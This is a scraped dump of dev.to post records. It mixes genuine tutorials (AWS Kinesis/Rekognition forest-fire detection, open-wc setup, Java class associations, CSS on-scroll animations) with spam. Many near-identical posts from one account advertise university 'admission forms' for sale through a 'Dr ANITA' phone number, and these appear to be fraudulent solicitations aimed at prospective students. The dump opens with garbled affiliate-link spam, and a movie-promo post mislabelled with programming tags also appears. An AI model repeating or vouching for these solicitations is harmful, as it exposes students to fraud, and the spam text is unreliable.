https://www.getresponse.com?a=6N9FqjpKCMStarring Kris Kristofferson and Willie Nelson. Two aging gunfighters re-form their old gang to avenge the murder of one of the former memberhttps://amzn.to/3V7aRdd【Comfortable & Breathable & Quick Dry】 Our hiking shorts men are made with highly breathable,Hiauspor Men's Hiking Cargo Shorts 9"/10" Quick Dry Lightweight Waterproof for Golf Tactical Fishing Casual with 6 Pocketshttps://www.jvzoo.com/newaffiliates/affiliatedashboardhttps://amzn.to/4aK9EhE | klodia_12 |
1,878,551 | Babcock University,Ilishan-Remo 2024/2025 Session Admission forms | Babcock University,Ilishan-Remo 2024/2025 Session Admission forms is out☎️ 07065086538 Dr ANITA for... | 0 | 2024-06-05T22:04:58 | https://dev.to/admin_dept_202e474d82b68c/babcock-universityilishan-remo-20242025-session-admission-forms-1c9d | webdev, beginners, programming | Babcock University,Ilishan-Remo 2024/2025 Session Admission forms is out☎️ 07065086538 Dr ANITA for purchase of the form and how to register on-line The general public is hereby informed that application forms for admission into the degree Programme 2024-2025 academic session. NURSING ADMISSION FORMS,INTER SCHOOL TRANSFER FORM,DIRECT ENTRY FORMS,MASTERS AND PHD FORMS,& PART-TIME FORMS are out and on sales in the school premises. Call the School Admin.DR.Mrs Anita on☎️ 07065086538 for more details on how to apply and register online. The School Authority 07065086538
requires all candidates applying for admission into any of its courses to possess Five (5) O' Level Credit Level Passes at not more than two (2) sittings to include English Language and Mathematics and three (3) other subjects relevant to course. | admin_dept_202e474d82b68c |
1,878,550 | Knox Goes Away | Starring Kris Kristofferson and Willie Nelson. Two aging gunfighters re-form their old gang to avenge... | 0 | 2024-06-05T22:04:50 | https://dev.to/klodia_12/knox-goes-away-130k | javascript, beginners, tutorial, ai | Starring Kris Kristofferson and Willie Nelson. Two aging gunfighters re-form their old gang to avenge the murder of one of the former member
Knox Goes Away
After a hit man (Michael Keaton) is diagnosed with dementia, he must race against the police to save his estranged son, and outrun the ticking clock of his own deteriorating mind.
208IMDb 6.91 h 54 https://amzn.to/4e7eSqH | klodia_12 |
1,854,457 | How to detect Forest fires using Kinesis Video Streams and Amazon Rekognition | Introduction On a hot summer night, while we were enjoying our food and drinks, the dogs... | 0 | 2024-06-05T22:01:55 | https://dev.to/aws-builders/how-to-detect-forest-fires-using-kinesis-video-streams-and-rekognition-4he8 | aws, kinesis, rekognition, globallogic | #Introduction#
On a hot summer night, while we were enjoying our food and drinks, the dogs suddenly began barking and staring in a certain direction. We went outside to have a better look and noticed that the sky had started to turn orange. We immediately knew what was happening: there was a huge fire in a beautiful forest a few miles away. This was happening almost every summer, at different places, wiping out forests and destroying homes, with a massive impact on the environment and people's lives.
Having seen the aftermath and the years it took for the burnt areas and people to recover, I decided to build something to detect smoke and fire and help reduce the destructive impact. After all, early detection plays a crucial role when it comes to forest fires.
# Challenges
Waiting for a real-life scenario like the one described above was neither an option nor desirable for testing my solution. To overcome this challenge, I decided to simulate the required conditions.
I used my laptop and played YouTube videos of forest fires as the source. This allowed me to consistently recreate the visual characteristics of forest fires and to use specific scenes, ensuring that the solution was tested thoroughly under different conditions. It provided a reliable and efficient way to validate the solution and demonstrate how it could handle similar real-time scenarios.

# Prerequisites
Here is a brief overview of the AWS services and components used in the solution:
**RTSP Camera**
An IP/CCTV camera
**Raspberry Pi**
This acts as a local gateway that connects to the camera and pushes the video stream up to Amazon Kinesis Video Streams. It uses certificates generated by AWS IoT Core to authenticate itself securely to AWS services.
**AWS IoT**
Set up an IoT Thing to represent my IP camera. This involved configuring the certificates and policies for secure communication between the IP camera and AWS IoT. It is an important component in creating a secure and manageable architecture for streaming video from an RTSP camera through a Raspberry Pi to Kinesis Video Streams.

**Kinesis Video Stream KVS**
A Kinesis Video Stream to ingest live video from the RTSP camera (with a name matching the IoT Thing).

**Amazon Rekognition**
Trained a Rekognition Custom Labels model to detect smoke and fire in images. Training takes some time, depending on the size of the dataset. (The ARN is used in Lambda functions).

**S3**
Created an S3 bucket to store the extracted images from the IP camera, with the appropriate bucket policies to allow read/write access from the AWS services used.

**Lambda**
Wrote a Lambda function that processes images stored in S3, detects smoke and fire using Rekognition, and triggers an SNS notification.

**SNS**
If smoke or fire is detected by the Rekognition Custom Labels model, the Lambda function triggers a notification using Amazon Simple Notification Service (SNS). SNS can then deliver the notification to subscribed endpoints, such as email, SMS, or mobile push notifications.

**IAM Roles**
Created the required IAM roles and policies for Kinesis Video Streams, Rekognition, Lambda, IoT, S3, and SNS. As per best practices, least privilege principles were applied.
**Producer SDK - GStreamer plugin**
The GStreamer plugin from the Kinesis Video Streams Producer SDK integrates GStreamer with Amazon Kinesis Video Streams, allowing a GStreamer pipeline to publish video directly to a stream.
# Solution Overview and Walkthrough
Here is a brief overview of how the solution works.

The first thing to do is to start the Amazon Rekognition Model that we trained.

Next, we need to set up the RTSP camera and test the stream using VLC. Then we move on and configure the GStreamer plugin on the Raspberry Pi.
We have to transfer the certificates to the Raspberry Pi and place them in a specific directory.
Obtain the IoT credential endpoint using AWS CloudShell or awscli:
```
aws iot describe-endpoint --endpoint-type iot:CredentialProvider
```

The next step is to set the environment variables for the region, certificate paths, and role alias:
```
export AWS_DEFAULT_REGION=eu-west-1
export CERT_PATH=certs/certificate.pem.crt
export PRIVATE_KEY_PATH=certs/private.pem.key
export CA_CERT_PATH=certs/AmazonRootCA1.pem
export ROLE_ALIAS=CameraIoTRoleAlias
export IOT_GET_CREDENTIAL_ENDPOINT=cxxxxxxxxxxs.credentials.iot.eu-west-1.amazonaws.com
```
Now we can execute the GStreamer command and start streaming to Kinesis Video Streams:
```
./kvs_gstreamer_sample FireDetection rtsp://username:password@192.168.1.100/stream1
```
With the video feed successfully streaming to Kinesis Video Streams, it's time to start extracting the images from the stream.
Kinesis Video Streams simplifies this process by automatically transcoding and delivering images. It extracts images from video data in real-time based on tags and delivers them to a specified S3 bucket.
To use that feature, we need to create a JSON file named ***update-image-generation-input.json*** with the required config.
```
{
"StreamName": "FireDetection",
"ImageGenerationConfiguration":
{
"Status": "ENABLED",
"DestinationConfig":
{
"DestinationRegion": "eu-west-1",
"Uri": "s3://images-bucket-name"
},
"SamplingInterval": 200,
"ImageSelectorType": "PRODUCER_TIMESTAMP",
"Format": "JPEG",
"FormatConfig": {
"JPEGQuality": "80"
},
"WidthPixels": 1080,
"HeightPixels": 720
}
}
```
Then run the following command with the AWS CLI:
```
aws kinesisvideo update-image-generation-configuration \
--cli-input-json file://./update-image-generation-input.json
```
If we check our S3 bucket, we can see the extracted images.

Our Lambda function is now going to be triggered and will start processing them using Amazon Rekognition. This allows for identifying smoke/fire objects within the images and triggering notifications based on detected objects.

## Conclusion
We now have a solution where our IP camera streams video to a Kinesis Video Stream. AWS Lambda processes frames from this stream, using Amazon Rekognition Custom Labels to detect smoke and fire. Detected events then trigger SNS notifications.
By integrating Amazon Rekognition with custom labels, Kinesis Video Streams, S3, and AWS IoT, we can create a powerful image recognition system for many use cases.
For a more detailed walkthrough, feel free to contact me. | ngargoulakis |
1,878,549 | JavaScript is the best type of code | A post by Yuvaan | 0 | 2024-06-05T22:00:26 | https://dev.to/bharatrolling/javascript-is-the-best-type-of-code-5f49 | bharatrolling | ||
1,878,547 | Baze University,2024/2025 Session Admission forms is out | Baze University,2024/2025 Session Admission forms is out☎️ 07065086538 Dr ANITA for purchase of the... | 0 | 2024-06-05T21:54:07 | https://dev.to/admin_dept_202e474d82b68c/baze-university20242025-session-admission-forms-is-out-4j92 | webdev, beginners, programming, tutorial | Baze University,2024/2025 Session Admission forms is out☎️ 07065086538 Dr ANITA for purchase of the form and how to register on-line The general public is hereby informed that application forms for admission into the degree Programme 2024-2025 academic session. NURSING ADMISSION FORMS,INTER SCHOOL TRANSFER FORM,DIRECT ENTRY FORMS,MASTERS AND PHD FORMS,& PART-TIME FORMS are out and on sales in the school premises. Call the School Admin.DR.Mrs Anita on☎️ 07065086538 for more details on how to apply and register online. The School Authority 07065086538
requires all candidates applying for admission into any of its courses to possess Five (5) O' Level Credit Level Passes at not more than two (2) sittings to include English Language and Mathematics and three (3) other subjects relevant to course. | admin_dept_202e474d82b68c |
1,878,546 | Bells University of Technology, Otta,2024/2025 Session Admission forms | Bells University of Technology, Otta,2024/2025 Session Admission forms is out☎️ 07065086538 Dr ANITA... | 0 | 2024-06-05T21:53:27 | https://dev.to/admin_dept_202e474d82b68c/bells-university-of-technology-otta20242025-session-admission-forms-oa0 | Bells University of Technology, Otta,2024/2025 Session Admission forms is out☎️ 07065086538 Dr ANITA for purchase of the form and how to register on-line The general public is hereby informed that application forms for admission into the degree Programme 2024-2025 academic session. NURSING ADMISSION FORMS,INTER SCHOOL TRANSFER FORM,DIRECT ENTRY FORMS,MASTERS AND PHD FORMS,& PART-TIME FORMS are out and on sales in the school premises. Call the School Admin.DR.Mrs Anita on☎️ 07065086538 for more details on how to apply and register online. The School Authority 07065086538
requires all candidates applying for admission into any of its courses to possess Five (5) O' Level Credit Level Passes at not more than two (2) sittings to include English Language and Mathematics and three (3) other subjects relevant to course. | admin_dept_202e474d82b68c | |
1,878,545 | Benson Idahosa University, Benin City,2024/2025 Session Admission forms | Benson Idahosa University, Benin City,2024/2025 Session Admission forms is out☎️ 07065086538 Dr ANITA... | 0 | 2024-06-05T21:45:12 | https://dev.to/admin_dept_202e474d82b68c/benson-idahosa-university-benin-city20242025-session-admission-forms-3ead | school, universirty | Benson Idahosa University, Benin City,2024/2025 Session Admission forms is out☎️ 07065086538 Dr ANITA for purchase of the form and how to register on-line The general public is hereby informed that application forms for admission into the degree Programme 2024-2025 academic session. NURSING ADMISSION FORMS,INTER SCHOOL TRANSFER FORM,DIRECT ENTRY FORMS,MASTERS AND PHD FORMS,& PART-TIME FORMS are out and on sales in the school premises. Call the School Admin.DR.Mrs Anita on☎️ 07065086538 for more details on how to apply and register online. The School Authority 07065086538
requires all candidates applying for admission into any of its courses to possess Five (5) O' Level Credit Level Passes at not more than two (2) sittings to include English Language and Mathematics and three (3) other subjects relevant to course. | admin_dept_202e474d82b68c |
807,219 | Tutorial: Getting Started with Open-wc | Open-WC, also known as Open Web-components is vital to getting you started on web-programming! It... | 0 | 2021-08-30T00:15:00 | https://dev.to/haileyhahnnnn/tutorial-getting-started-with-open-wc-4mk2 | Open-wc, also known as Open Web Components, is vital to getting you started on web programming! It utilizes various ideas on how to build web components and is accessible to anyone interested and ready to learn! Now, let's get started.
**Tools Needed**
Listed below are the tools needed to get started with Open-wc:
1. A computer which you have full admin rights.
2. Basic understanding of how to navigate through your device
3. Basic understanding of how to run terminal commands
**Installing VSCode**
For this tutorial, we will start by downloading an IDE: VSCode. Some programmers prefer other IDEs, which is also completely fine. VSCode is great because it is available as a free download for Windows, macOS, and Linux. If interested in VSCode, click this link (https://code.visualstudio.com/), which brings you to the free download page. Once you find the correct download for your computer (Windows/Mac/etc.), click download and install.
When you first open the application, it will ask for permission from the owner of the PC to access certain levels of your folder structure. Please grant access, otherwise the IDE cannot be used on your PC. Overall, this is usually a very easy process.
**Installing NodeJS with NPM**
Note: NodeJS comes with npm (node package manager), so you do not have to perform a separate installation for it.
Click here to install NodeJS: [https://nodejs.org/en/]
Once you reach the site, find the correct download for your PC and hit download. Follow the instructions to finish out the installation of NodeJS; they are quite simple and easy. If you would like to check that everything is installed correctly, you can proceed to your terminal and type `node -v` and `npm -v`. If you have installed everything correctly, you will receive the version number in response.
**Installing Yarn**
The next step is installing Yarn to your PC. To start off click this link: [https://yarnpkg.com/]
Once you have the website opened up, you must open up the terminal in your PC. Once your terminal is opened up, use the following command that utilizes the npm that we had previously installed.
```npm install --global yarn```
In the rare case that you run into a permission error while installing Yarn, add `sudo` in front of your initial command, which would be
```sudo npm install --global yarn```
**Install Open-wc boilerplate**
Congrats! You have made it to the final step of this tutorial. We are now ready to set up our open-wc with these last few steps:
1. Choose a location on your local machine. I prefer to use a folder on my desktop. This is where you will install and access the boilerplates.
2. Once you have created a folder, go back and open your terminal and navigate yourself to the correct level and folder.
3. Run `npm init @open-wc` (use `sudo` if you get denied access)
4. When the download begins, you will be prompted with a series of questions. You want to select:
- Scaffold a new project
- Web Components, Linting
- No(for TypeScript)
- Type in lowercase "hello-world" for your tag name
- yes for writing the file structure to disk
- yes for installing with yarn
Congrats, you have completed the download of open-wc! If you have any other questions/comments, please leave them below! I hope you enjoy your web programming journey!
| haileyhahnnnn | |
1,878,544 | Bingham University,Karu,2024/2025 Session Admission forms i | Bingham University,Karu,2024/2025 Session Admission forms is out☎️ 07065086538 Dr ANITA for purchase... | 0 | 2024-06-05T21:44:11 | https://dev.to/admin_dept_202e474d82b68c/bingham-universitykaru20242025-session-admission-forms-i-59e1 | webdev, javascript | Bingham University,Karu,2024/2025 Session Admission forms is out☎️ 07065086538 Dr ANITA for purchase of the form and how to register on-line The general public is hereby informed that application forms for admission into the degree Programme 2024-2025 academic session. NURSING ADMISSION FORMS,INTER SCHOOL TRANSFER FORM,DIRECT ENTRY FORMS,MASTERS AND PHD FORMS,& PART-TIME FORMS are out and on sales in the school premises. Call the School Admin.DR.Mrs Anita on☎️ 07065086538 for more details on how to apply and register online. The School Authority 07065086538
requires all candidates applying for admission into any of its courses to possess Five (5) O' Level Credit Level Passes at not more than two (2) sittings to include English Language and Mathematics and three (3) other subjects relevant to course. | admin_dept_202e474d82b68c |
1,878,543 | Bowen University, Iwo,2024/2025 Session Admission forms | Bowen University, Iwo,2024/2025 Session Admission forms is out☎️ 07065086538 Dr ANITA for purchase of... | 0 | 2024-06-05T21:38:40 | https://dev.to/admin_dept_202e474d82b68c/bowen-university-iwo20242025-session-admission-forms-17ob | sql, codepen, rust, git | Bowen University, Iwo,2024/2025 Session Admission forms is out☎️ 07065086538 Dr ANITA for purchase of the form and how to register on-line The general public is hereby informed that application forms for admission into the degree Programme 2024-2025 academic session. NURSING ADMISSION FORMS,INTER SCHOOL TRANSFER FORM,DIRECT ENTRY FORMS,MASTERS AND PHD FORMS,& PART-TIME FORMS are out and on sales in the school premises. Call the School Admin.DR.Mrs Anita on☎️ 07065086538 for more details on how to apply and register online. The School Authority 07065086538
requires all candidates applying for admission into any of its courses to possess Five (5) O' Level Credit Level Passes at not more than two (2) sittings to include English Language and Mathematics and three (3) other subjects relevant to course. | admin_dept_202e474d82b68c |
1,878,542 | Caleb University, Lagos,2024/2025 Session Admission forms | Caleb University, Lagos,2024/2025 Session Admission forms is out☎️ 07065086538 Dr ANITA for purchase... | 0 | 2024-06-05T21:37:57 | https://dev.to/admin_dept_202e474d82b68c/caleb-university-lagos20242025-session-admission-forms-658 | web3, flutter, gamedev | Caleb University, Lagos,2024/2025 Session Admission forms is out☎️ 07065086538 Dr ANITA for purchase of the form and how to register on-line The general public is hereby informed that application forms for admission into the degree Programme 2024-2025 academic session. NURSING ADMISSION FORMS,INTER SCHOOL TRANSFER FORM,DIRECT ENTRY FORMS,MASTERS AND PHD FORMS,& PART-TIME FORMS are out and on sales in the school premises. Call the School Admin.DR.Mrs Anita on☎️ 07065086538 for more details on how to apply and register online. The School Authority 07065086538
requires all candidates applying for admission into any of its courses to possess Five (5) O' Level Credit Level Passes at not more than two (2) sittings to include English Language and Mathematics and three (3) other subjects relevant to course. | admin_dept_202e474d82b68c |
1,878,541 | Understanding Reactive Contexts in Angular 18 | A Deep Dive into Managing State Reactivity and Signals Defining a Reactive... | 0 | 2024-06-05T21:33:41 | https://dev.to/diegoquesadadev/understanding-reactive-contexts-in-angular-18-17b9 | angular, signals, reactive, frontend | #### *A Deep Dive into Managing State Reactivity and Signals*
---
### Defining a Reactive Context and Its Importance for Signals
In Angular 18, the concept of Reactive Contexts is fundamental to efficiently managing signals and state reactivity within applications. A Reactive Context is essentially an environment where changes to signals (reactive state variables) can be monitored and reacted to, ensuring that the UI stays in sync with the underlying state.
#### Why are Reactive Contexts Essential?
Reactive Contexts provide a controlled way to handle the propagation of changes. This is crucial because:
* **Efficiency:** They help minimize unnecessary computations and DOM updates.
* **Consistency:** They ensure the UI reflects the most current state without glitches.
* **Scalability:** They allow for more scalable state management by localizing reactivity.
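To build intuition for how a reactive context tracks its dependencies, here is a minimal, framework-free sketch in plain TypeScript. This is an illustration only, not Angular's actual implementation; the `signal`/`effect` names are borrowed for familiarity:

```typescript
type EffectFn = () => void;

// The reactive context currently running, if any
let activeEffect: EffectFn | null = null;

// signal(): holds a value plus the set of reactive contexts that read it
function signal<T>(initial: T) {
  let value = initial;
  const subscribers = new Set<EffectFn>();
  const read = (() => {
    if (activeEffect) subscribers.add(activeEffect); // dependency tracking
    return value;
  }) as (() => T) & { set(next: T): void };
  read.set = (next) => {
    value = next;
    subscribers.forEach((fn) => fn()); // notify every dependent context
  };
  return read;
}

// effect(): establishes a reactive context while fn runs
function effect(fn: EffectFn): void {
  activeEffect = fn;
  fn(); // the first run registers the signals fn reads
  activeEffect = null;
}

// Usage: the effect re-runs whenever a signal it read changes
const count = signal(0);
const seen: number[] = [];
effect(() => seen.push(count()));
count.set(1);
count.set(2);
console.log(seen); // → [0, 1, 2]
```

The key idea this sketch demonstrates is that a reactive context does not need an explicit subscription list: simply *reading* a signal while the context is active registers the dependency.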
---
### Utilizing the Effect Function to Establish a Reactive Context
The `effect` function in Angular is used to create a Reactive Context that listens for changes in specified signals and executes a callback when those changes occur.
**Example**
```typescript
import { effect, signal } from '@angular/core';
const count = signal(0);
// Note: in a real app, effect() must be created in an injection context
const ref = effect(() => {
  console.log(`Count value is: ${count()}`);
});

count.set(1); // Logs: "Count value is: 1"

ref.destroy(); // effect() returns an EffectRef; destroy() stops listening
```
> In this example, the `effect` function sets up a Reactive Context that logs the value of `count` whenever it changes. The `effect` function ensures that the Reactive Context is kept up to date with any changes to the signals it monitors.
---
### Reactive Contexts in Angular Templates: How They Operate
In Angular templates, Reactive Contexts are implicitly created and managed. When you use Angular’s template syntax to bind to signals, Angular sets up a Reactive Context that ensures the template updates whenever the bound signals change.
**Example**
```html
<div>{{ count() }}</div>
<button (click)="count.set(count() + 1)">Increment</button>
```
> Here, the template creates a Reactive Context for the `count` signal. Whenever `count` changes, the div's content is automatically updated.
---
### Distinguishing Between Effect Functions and Template Reactive Contexts
While both `effect` functions and template bindings create Reactive Contexts, there are subtle differences in how they operate:
* **`effect` Function:** Explicitly defines a Reactive Context in your JavaScript/TypeScript code, giving you fine-grained control over what and how things react to changes.
* **Template Reactive Contexts:** Implicitly managed by Angular, focusing on keeping the UI in sync with the state without the need for explicit setup.
---
### Understanding Why Effect Functions Trigger More Frequently Than Templates
One notable behavior is that `effect` functions can be triggered more frequently than template updates. This can happen because:
* **Granular Reactivity:** effect functions react to every signal change they are subscribed to, regardless of whether the changes are relevant to the UI.
* **Batching:** Angular’s template engine often batches updates to minimize DOM manipulations, while effect functions respond immediately to state changes.
#### Why This Behavior is Not Problematic
Frequent triggers in `effect` functions are generally not an issue because:
* **Controlled Scope:** They usually handle non-UI side effects where immediate reactions are desirable.
* **Performance Optimization:** Angular’s internal mechanisms ensure these triggers are handled efficiently, without causing performance bottlenecks.
---
### Conclusion
Understanding Reactive Contexts in Angular 18 is key to leveraging the power of signals and reactive programming in your applications. Whether through the explicit use of `effect` functions or the implicit Reactive Contexts in templates, Angular provides robust tools to manage state reactivity effectively. By grasping these concepts, you can write more efficient, maintainable, and scalable Angular applications.
| diegoquesadadev |
1,878,540 | Class Relationships | To design classes, you need to explore the relationships among classes. The common relationships... | 0 | 2024-06-05T21:33:08 | https://dev.to/paulike/class-relationships-324b | java, programming, learning, beginners | To design classes, you need to explore the relationships among classes. The common relationships among classes are association, aggregation, composition, and inheritance. This section explores association, aggregation, and composition.
## Association
_Association_ is a general binary relationship that describes an activity between two classes. For example, a student taking a course is an association between the **Student** class and the **Course** class, and a faculty member teaching a course is an association between the **Faculty** class and the **Course** class. These associations can be represented in UML graphical notation, as shown in Figure below.

This UML diagram shows that a student may take any number of courses, a faculty member may teach at most three courses, a course may have from five to sixty students, and a course is taught by only one faculty member. An association is illustrated by a solid line between two classes with an optional label that describes the relationship. In Figure above, the labels are _Take_ and _Teach_. Each relationship may have an optional small black triangle that indicates the direction of the relationship. In this figure, the direction indicates that a student takes a course (as opposed to a course taking a student).
Each class involved in the relationship may have a role name that describes the role it plays in the relationship. In Figure above, _teacher_ is the role name for **Faculty**.
Each class involved in an association may specify a _multiplicity_, which is placed at the side of the class to specify how many of the class’s objects are involved in the relationship in UML. A multiplicity could be a number or an interval that specifies how many of the class’s objects are involved in the relationship. The character ***** means an unlimited number of objects, and the interval **m..n** indicates that the number of objects is between **m** and **n**, inclusively. In Figure above, each student may take any number of courses, and each course must have at least five and at most sixty students. Each course is taught by only one faculty member, and a faculty member may teach from zero to three courses per semester.
In Java code, you can implement associations by using data fields and methods. For example, the relationships in Figure above may be implemented using the classes in Figure below.

The relation “a student takes a course” is implemented using the **addCourse** method in the **Student** class and the **addStudent** method in the **Course** class. The relation “a faculty teaches a course” is implemented using the **addCourse** method in the **Faculty** class and the **setFaculty** method in the **Course** class. The **Student** class may use a list to store the courses that the student is taking, the **Faculty** class may use a list to store the courses that the faculty is teaching, and the **Course** class may use a list to store students enrolled in the course and a data field to store the instructor who teaches the course.
There are many possible ways to implement relationships. For example, the student and faculty information in the **Course** class can be omitted, since they are already in the **Student** and **Faculty** class. Likewise, if you don’t need to know the courses a student takes or a faculty member teaches, the data field **courseList** and the **addCourse** method in **Student** or **Faculty** can be omitted.
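As a minimal runnable sketch of one such implementation choice, the "student takes a course" association can be maintained from both ends in a single call. The method names follow the UML above; everything else (field names, omitted attributes) is illustrative:

```java
import java.util.ArrayList;
import java.util.List;

// Minimal sketch of the "student takes a course" association.
class Course {
    private final List<Student> classList = new ArrayList<>();

    // Called from Student.addCourse to keep both sides consistent
    void addStudent(Student student) {
        classList.add(student);
    }

    int getEnrollment() {
        return classList.size();
    }
}

class Student {
    private final List<Course> courseList = new ArrayList<>();

    // Maintains both ends of the association in one call
    void addCourse(Course course) {
        courseList.add(course);
        course.addStudent(this);
    }

    int getCourseCount() {
        return courseList.size();
    }
}
```

Updating both sides inside `addCourse` avoids the common bug where the student's list and the course's roster drift out of sync.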
## Aggregation and Composition
_Aggregation_ is a special form of association that represents an ownership relationship between two objects. Aggregation models has-a relationships. The owner object is called an _aggregating object_, and its class is called an _aggregating class_. The subject object is called an _aggregated object_, and its class is called an _aggregated class_.
An object can be owned by several other aggregating objects. If an object is exclusively owned by an aggregating object, the relationship between the object and its aggregating object is referred to as a _composition_. For example, “a student has a name” is a composition relationship between the **Student** class and the **Name** class, whereas “a student has an address” is an aggregation relationship between the **Student** class and the **Address** class, since an address can be shared by several students. In UML, a filled diamond is attached to an aggregating class (in this case, **Student**) to denote the composition relationship with an aggregated class (**Name**), and an empty diamond is attached to an aggregating class (**Student**) to denote the aggregation relationship with an aggregated class (**Address**), as shown in Figure below.

In Figure above, each student has one address, and each address can be shared by up to **3** students. Each student has one name, and a name is unique for each student.
An aggregation relationship is usually represented as a data field in the aggregating class. For example, the relationships in Figure above may be implemented using the classes in Figure below. The relation “a student has a name” and “a student has an address” are implemented in the data field **name** and **address** in the **Student** class.

Aggregation may exist between objects of the same class. For example, a person may have a supervisor. This is illustrated in Figure below.

In the relationship “a person has a supervisor,” a supervisor can be represented as a data field in the **Person** class, as follows:
```java
public class Person {
  // The type for the data is the class itself
  private Person supervisor;
  ...
}
```
If a person can have several supervisors, as shown in Figure below (a), you may use an array to store supervisors, as shown in Figure below (b).

Since aggregation and composition relationships are represented using classes in the same way, we will not differentiate them and call both compositions for simplicity. | paulike |
1,878,539 | Caritas University, Enugu,2024/2025 Session Admission forms | Caritas University, Enugu,2024/2025 Session Admission forms is out☎️ 07065086538 Dr ANITA for... | 0 | 2024-06-05T21:31:35 | https://dev.to/admin_dept_202e474d82b68c/caritas-university-enugu20242025-session-admission-forms-1cj1 | web3, vue, flutter | Caritas University, Enugu,2024/2025 Session Admission forms is out☎️ 07065086538 Dr ANITA for purchase of the form and how to register on-line The general public is hereby informed that application forms for admission into the degree Programme 2024-2025 academic session. NURSING ADMISSION FORMS,INTER SCHOOL TRANSFER FORM,DIRECT ENTRY FORMS,MASTERS AND PHD FORMS,& PART-TIME FORMS are out and on sales in the school premises. Call the School Admin.DR.Mrs Anita on☎️ 07065086538 for more details on how to apply and register online. The School Authority 07065086538
requires all candidates applying for admission into any of its courses to possess Five (5) O' Level Credit Level Passes at not more than two (2) sittings to include English Language and Mathematics and three (3) other subjects relevant to course. | admin_dept_202e474d82b68c |
1,878,538 | On-Scroll Animation | Hey everyone! I recently worked on a cool feature: on-scroll animations. These animations make your... | 0 | 2024-06-05T21:30:47 | https://dev.to/alikhanzada577/on-scroll-animation-11am | animation, frontend, css, javascript | Hey everyone!
I recently worked on a cool feature: **on-scroll animations**.
These animations make your site more engaging and interactive. I used the Intersection Observer API to achieve this effect, and it was surprisingly easy. Here’s a quick rundown of how I did it.
**HTML**
First, I set up the HTML structure. I created several sections that would animate into view as the user scrolls. Here’s the code:
```
<body>
<section class="hidden">
<h1>Hello Folks!</h1>
<p>On scroll code snippet</p>
</section>
<section class="hidden">
<h2>Tech Stack</h2>
<div class="logos">
<div class="logo hidden">
<img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTYk594AhSKw5Eb3iHkPHs_XmpCqaRVgu0mvg&s" alt="logo">
</div>
<div class="logo hidden">
<img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQ_9-dX6ofdk9qorLSVu4R02VV2StVoC1rboA&s" alt="logo">
</div>
<div class="logo hidden">
<img src="https://logodownload.org/wp-content/uploads/2022/04/javascript-logo-1.png" alt="logo">
</div>
<div class="logo hidden">
<img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcThGyyY4OZ3bk3rFDaYtAbHR8htxrLHnjw2nxRL_80Xs7F0KG8-4dgIxP-wtQKFhdyXyvQ&usqp=CAU" alt="logo">
</div>
</div>
</section>
<section class="hidden">
<h2>Front End Engineering</h2>
<p>The things you own end up owning you! It's only after you lose everything that you're free to do anything</p>
</section>
</body>
```
**CSS**
Next, I wrote some CSS to style the sections. The key was to start with the elements hidden and then animate them into view. Here’s what the CSS looks like:
```
body {
background-color: #131316;
color: #ffffff;
font-family: 'Poppins', sans-serif;
padding: 0;
margin: 0;
}
section {
display: grid;
place-items: center;
align-content: center;
min-height: 100vh;
}
.hidden {
opacity: 0;
filter: blur(5px);
transform: translateX(-100%);
transition: all 1s;
}
.show {
opacity: 1;
filter: blur(0);
transform: translateX(0);
}
.logos {
display: flex;
}
.logo {
margin-left: 2px;
margin-right: 2px;
}
.logo img {
height: 100px;
}
.logo:nth-child(2) {
transition-delay: 200ms;
}
.logo:nth-child(3) {
transition-delay: 400ms;
}
.logo:nth-child(4) {
transition-delay: 600ms;
}
```
**JavaScript for Intersection Observer**
The real magic happens with JavaScript. I used the Intersection Observer API to detect when each section comes into view and apply the animation. Here’s the script:
```
document.addEventListener('DOMContentLoaded', () => {
const observer = new IntersectionObserver((entries) => {
entries.forEach((entry) => {
if (entry.isIntersecting) {
entry.target.classList.add('show');
} else {
entry.target.classList.remove('show');
}
});
});
const hiddenElements = document.querySelectorAll('.hidden');
hiddenElements.forEach((el) => observer.observe(el));
});
```
**How It Works**
**HTML**
- I created sections with the class **hidden** which will be animated into view.
**CSS**
- The .hidden class hides the elements initially using opacity, blur, and transform properties.
- The .show class makes the elements visible by resetting these properties.
**JavaScript**
- An **IntersectionObserver** checks if elements are in the viewport.
- When elements come into view, the **show** class is added to make them visible.
And that’s it! With this setup, as you scroll down the page, the hidden sections will smoothly animate into view. This little touch can really enhance the user experience on your site. I had a lot of fun implementing it, and I hope you do too.
**Happy coding!**
Also, Check out this Pen I made!
{% codepen https://codepen.io/Alikhanzada577/pen/pomwNqo %}
| alikhanzada577 |
1,878,537 | Covenant University Ota,2024/2025 Session Admission forms | Covenant University Ota,2024/2025 Session Admission forms are on sales.Contact the admin of the... | 0 | 2024-06-05T21:29:57 | https://dev.to/admin_dept_202e474d82b68c/covenant-university-ota20242025-session-admission-forms-4j4l | webdev, beginners | Covenant University Ota,2024/2025 Session Admission forms are on sales.Contact the admin of the school ☎️ 07065086538 Dr ANITA for purchase of the form and how to register on-line. The general public is hereby informed that application forms for admission into the degree Programme 2024-2025 academic session. NURSING ADMISSION FORMS,INTER SCHOOL TRANSFER FORM,DIRECT ENTRY FORMS,MASTERS AND PHD FORMS,& PART-TIME FORMS are out and on sales in the school premises. Call the School Admin.DR.Mrs Anita on☎️ 07065086538 for more details on how to apply and register online. The School Authority requires all candidates applying for admission into any of its courses to possess Five (5) O' Level Credit Level Passes at not more than two (2) sittings to include English Language and Mathematics and three (3) other subjects relevant to course. | admin_dept_202e474d82b68c |
1,878,536 | Crawford University Igbesa,2024/2025 Session Admission form | Crawford University Igbesa,2024/2025 Session Admission forms are on sales.Contact the admin of the... | 0 | 2024-06-05T21:26:18 | https://dev.to/admin_dept_202e474d82b68c/crawford-university-igbesa20242025-session-admission-form-53g3 | webdev, beginners | Crawford University Igbesa,2024/2025 Session Admission forms are on sales.Contact the admin of the school ☎️ 07065086538 Dr ANITA for purchase of the form and how to register on-line. The general public is hereby informed that application forms for admission into the degree Programme 2024-2025 academic session. NURSING ADMISSION FORMS,INTER SCHOOL TRANSFER FORM,DIRECT ENTRY FORMS,MASTERS AND PHD FORMS,& PART-TIME FORMS are out and on sales in the school premises. Call the School Admin.DR.Mrs Anita on☎️ 07065086538 for more details on how to apply and register online. The School Authority requires all candidates applying for admission into any of its courses to possess Five (5) O' Level Credit Level Passes at not more than two (2) sittings to include English Language and Mathematics and three (3) other subjects relevant to course. | admin_dept_202e474d82b68c |
